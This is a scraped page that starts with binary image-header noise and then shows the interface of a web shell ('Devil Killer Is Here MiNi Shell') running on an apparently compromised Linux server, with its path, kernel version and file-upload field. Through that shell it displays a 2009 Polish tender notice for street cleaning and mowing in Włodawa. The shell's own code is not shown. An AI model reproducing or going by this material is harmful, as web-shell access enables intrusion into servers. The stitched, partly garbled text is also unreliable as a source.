JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090225/42079-N-2009.html

<p class="kh_header"><b>Włodawa: Utrzymanie czystości w pasach drogowych dróg wojewódzkich:
          - nr 812   (ul. Korolowska i ul. Chełmska),  
          - nr 816   (Al. J. Piłsudskiego, ul. Rynek i ul. Okunińska )
          na terenie miasta Włodawa</b><br>
<b>Numer ogłoszenia: 42079 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości w pasach drogowych dróg wojewódzkich:
          - nr 812   (ul. Korolowska i ul. Chełmska),  
          - nr 816   (Al. J. Piłsudskiego, ul. Rynek i ul. Okunińska )
          na terenie miasta Włodawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Zakres usług:
 
ZADANIE NR 1
1) Zamiatanie ulicy Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska  + drogi podporządkowane w granicach pasa drogowego od km 60+130 do km 62+440
3465 m2  - 7 krotnie  (średnio raz w miesiącu)
2) Koszenie traw i chwastów z ich zgrabieniem i usunięciem, grabienie i usunięcie liści (Al. J. Piłsudskiego, ul. Rynek , ul. Okunińska 
od km 60+130 do km 62+440) 9267 m2 -  4 krotnie (w zależności od potrzeb)
3) Zbieranie śmieci z pasa drogowego z ich unieszkodliwieniem  (Al. J. Piłsudskiego, ul. Rynek , ul. Okunińska) od km 60+130 do km 62+440 -
14 krotnie  (średnio 2 razy w miesiącu)
4) Zamiatanie chodników wzdłuż  Al. J. Piłsudskiego i ul. Rynek, ul. Okunińska od km 60+130 do km 62+440	6887 m2 - 14 krotnie (średnio 2 razy w miesiącu)
5) Opróżnianie koszy na śmiecie - 39 szt.
- 5 szt. o poj.  40 l,
- 34 szt.  o poj. 60 l.	 30 krotnie   (średnio raz w tygodniu)
ZADANIE NR 2
1) Koszenie traw i chwastów z ich zgrabieniem i usunięciem,  - skrzyżowanie ulic Korolowska -Chełmska (rondo + dojazdy)	
2088 m2 - 4 krotnie (w zależności od potrzeb)
2) Zbieranie śmieci z pasa drogowego z ich unieszkodliwieniem  (ul. Korolowska i 
ul. Chełmska) od km 74+685 do km 77+240 
-14 krotnie   (średnio 2 razy  w miesiącu)
3) Zamiatanie chodników  ul. Korolowska 
i ul. Chełmska - rondo + ciąg pieszo-rowerowy	
5962 m2 - 14 krotnie   (średnio 2 razy w miesiącu)
4) Zamiatanie jezdni  - skrzyżowanie ul. Korolowska i ul. Chełmska - rondo + dojazdy - 2116 m2 -  7 krotnie   (średnio raz w miesiącu)
5) Opróżnianie koszy na śmiecie - 2 szt. o poj. 60 l.-30 krotnie (średnio raz w tygodniu)

2.   Wykonawca zabezpieczy we własnym zakresie i na swój koszt wszystkie   niezbędne do  realizacji zamówienia środki transportowe i sprzęt.
3.   Sprzątanie należy wykonywać w godzinach o najmniejszym natężeniu ruchu 
      tj. do  godz. 600.
4.   Sprzątanie powinno odbywać się w sposób mechaniczny przy użyciu zamiatarki
      ulicznej  lub w przypadku braku możliwości użycia zamiatarki, ręcznie przy użyciu  szczotek i łopat z załadunkiem zanieczyszczeń na środki transportowe i 
      odwiezieniem we własnym zakresie i na własny koszt na wysypisko śmieci.
5.	Do obowiązków Wykonawcy należeć będzie:
a)	Oczyszczenie jezdni na szerokości 0,75 m od każdej z dwóch krawędzi,
b)	oczyszczenie wlotów dróg podporządkowanych w granicach pasa drogowego,
c)	oczyszczenie chodników na całej szerokości,
d)	oczyszczenie nawierzchni parkingów oraz zatok autobusowych    zlokalizowanych w granicach pasa drogowego przy drodze nr 816 
     (Al. J. Piłsudskiego),
e)	utrzymanie czystości na całej szerokości pasa drogowego,
f)	opróżnianie koszy na śmieci zlokalizowanych w pasie drogowym,
g)	koszenie traw i chwastów wraz z ich zgrabieniem i usunięciem, 
h)	grabienie liści i ich usunięcie,
i)	zagospodarowanie na własny koszt i we własnym zakresie zebranych     zanieczyszczeń. 
j)	realizowanie usługi z zachowaniem wszelkich zasad bezpieczeństwa, w szczególności wyposażenie pracującego sprzętu w lampy ostrzegawcze (pulsujące) koloru pomarańczowego oraz pracowników w kamizelki ostrzegawcze z elementami odblaskowymi.
3.	Warunki realizacji zamówienia:
      a) Zamawiający zastrzega sobie prawo zmniejszenia ilości usług poprzez
           zmniejszenie krotności ich wykonania,
b)  decyzję o konieczności wykonywania poszczególnych usług objętych zamówieniem podejmować będzie Kierownik Rejonu Dróg Wojewódzkich  we Włodawie.
c)	wzywanie do pracy zespołów roboczych Wykonawcy odbywać się będzie telefonicznie przez upoważnionego pracownika Zamawiającego ( nie dotyczy opróżniania koszy na śmieci, które należy opróżniać bez wezwania średnio 
     1 raz w tygodniu).
4.	Warunki zapłaty:
      a)  fakturowanie wykonanych usług będzie się odbywało nie częściej niż raz              w miesiącu.
      b)  podstawą wyliczenia wartości fakturowanych usług będzie iloczyn ceny jednostkowej -  stawka za wykonanie usługi (zgodnie z ofertą) i ilości wykonanych usług w miesiącu rozliczeniowym;
c)	zamówienie będzie realizowane maksymalnie do cen umownych - zgodnie              z cenami ofert wybranego (-ych) Wykonawcy (-ców) - za wykonanie poszczególnych zadań. 
5.  Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Prawo zamówień publicznych).
Wartość zamówienia - 74 615,00 zł w tym: zadanie nr 1 - 53 108,00 zł,
zadanie nr 2 - 21 507,00 zł.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.51.13.00-5, 77.31.50.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W przetargu mogą wziąć udział wykonawcy, którzy udokumentują przez stosowne zaświadczenia i oświadczenia, że spełniają następujące warunki:
1)	Są uprawnieni do występowania w obrocie prawnym zgodnie z wymaganiami ustawowymi.
2)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeśli ustawy nakładają obowiązek posiadania takich uprawnień
3)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
4)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
5)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo Zamówień Publicznych
6)	Akceptują warunki zawarte w niniejszej specyfikacji
2.  W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia
publicznego wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 


3.  Ponadto Wykonawca musi spełniać następujące wymagania:
Dysponowanie (przez dzierżawę, wynajem, umowę kupna lub inny sposób) niżej wymienionymi, w pełni sprawnymi jednostkami sprzętowymi:

1.	Zamiatarka uliczna	                                                min. 1
2. 	Ciągnik z przyczepą lub samochód ciężarowy samowyładowcz min 1

4. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie
     w następujący sposób: spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> .   W celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca załączy do oferty następujące oświadczenia lub dokumenty:
1)	Oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt. 1-4 ustawy Prawo     Zamówień Publicznych 2)	Dokument uprawniający Wykonawcę do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3)	Wykaz sprzętu 2.  Ponadto Wykonawca obowiązany jest dołączyć:
1)	Ofertę przetargową ( z ceną brutto,netto i z podatkiem VAT)  wraz z załącznikiem do oferty .
2)	Podpisany wzór umowy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.ebip.lublin.pl/zdw.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60,  pokój nr 2 w godz. 07:00 - 15:00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2009 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60,  pokój nr 15 (sekretariat)
Otwarcie ofert nastąpi w dniu 05/03/2009 o godz. 09:10  pok. nr 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr 082 572 17 93; 572 41 62, na piśmie lub drogą elektroniczną na adres  e-mail: rdw.wlodawa@zdw.lublin.pl.zgodnie z zasadami określonymi w art.27 ustawy.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej  niezwłocznie potwierdza fakt ich otrzymania.

Do kontaktów z Wykonawcami uprawnione są osoby:
1)	W sprawach technicznych - Tadeusz Soroka ( 082 572 16 92)
2)	W sprawach formalno -prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk ( 082 572 16 35), Eugeniusz Kiewczykowski (082 572 16 35).</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zamiatanie ulicy Al. J. Piłsudskiego, ul. Rynek, ul. Okunińska  + drogi podporządkowane w granicach pasa drogowego od km 60+130 do km 62+440	3465 m2 - 7 krotnie  (średnio raz w miesiącu)
2) Koszenie traw i chwastów z ich zgrabieniem i usunięciem, grabienie i usunięcie liści (Al. J. Piłsudskiego, ul. Rynek , ul. Okunińska 
od km 60+130 do km 62+440) 9267 m2 - 4 krotnie (w zależności od potrzeb)
3) Zbieranie śmieci z pasa drogowego z ich unieszkodliwieniem  (Al. J. Piłsudskiego, ul. Rynek , ul. Okunińska) od km 60+130 do km 62+440 - 14 krotnie  (średnio 2 razy w miesiącu)
4) Zamiatanie chodników wzdłuż  Al. J. Piłsudskiego i ul. Rynek, ul. Okunińska od km 60+130 do km 62+440	6887 m2 - 4 krotnie  (średnio 2 razy w miesiącu)
5) Opróżnianie koszy na śmiecie - 39 szt.
- 5 szt. o poj.  40 l,
- 34 szt.  o poj. 60 l.	 30 krotnie   (średnio raz w tygodniu)
Wartość zadania - 53 108,00 zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.51.13.00-5, 77.31.50.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Koszenie traw i chwastów z ich zgrabieniem i usunięciem,  - skrzyżowanie ulic Korolowska -Chełmska (rondo + dojazdy) 2088 m2 - 4 krotnie (w zależności od potrzeb)
2.Zbieranie śmieci z pasa drogowego z ich unieszkodliwieniem  (ul. Korolowska i 
ul. Chełmska) od km 74+685 do km 77+240	
14 krotnie  (średnio 2 razy  w miesiącu)
3.Zamiatanie chodników  ul. Korolowska i ul. Chełmska - rondo + ciąg pieszo-rowerowy	5962 m2 - 14 krotnie   (średnio 2 razy w miesiącu)
4.Zamiatanie jezdni  - skrzyżowanie ul. Korolowska i ul. Chełmska - rondo + dojazdy	2116 m2 - 7  krotnie  (średnio raz w miesiącu)
5.Opróżnianie koszy na śmiecie - 2 szt. o poj. 60 l. -30 krotnie   (średnio raz w tygodniu)
Wartość zadania - 21 507,00 zł.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.51.13.00-5, 77.31.50.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com